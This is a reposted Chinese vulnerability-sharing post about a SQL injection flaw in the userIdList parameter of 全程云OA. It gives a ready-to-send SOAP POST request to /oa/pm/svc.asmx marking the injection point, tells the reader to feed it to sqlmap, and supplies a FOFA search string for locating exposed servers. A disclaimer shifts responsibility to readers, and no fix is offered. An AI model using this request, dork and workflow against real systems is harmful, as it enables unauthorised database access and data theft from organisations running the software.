全程云OA userIdList存在SQL注入漏洞

admin 2024年1月7日13:11:55评论49 views字数 770阅读2分34秒阅读模式

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。

全程云OA userIdList存在SQL注入漏洞

漏洞影响范围

全程云OA userIdList存在SQL注入漏洞

 漏洞复现

漏洞poc

注入参数为userIdListPOST /oa/pm/svc.asmx HTTP/1.1Host: Content-Type: text/xml; charset=utf-8Content-Length: lengthSOAPAction: "http://tempuri.org/GetUsersInfo"
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetUsersInfo xmlns="http://tempuri.org/"> <userIdList>string*</userIdList> </GetUsersInfo> </soap:Body></soap:Envelope>

访问url+/oa/pm/svc.asmx?op=GetUsersInfo出现如下数据包代表漏洞存在,可直接放入sqlmap测试

全程云OA userIdList存在SQL注入漏洞

 搜索语法

fofa:body="images/yipeoplehover.png"

原文始发于微信公众号(小白菜安全):全程云OA userIdList存在SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月7日13:11:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   全程云OA userIdList存在SQL注入漏洞http://cn-sec.com/archives/2371813.html

发表评论

匿名网友 填写信息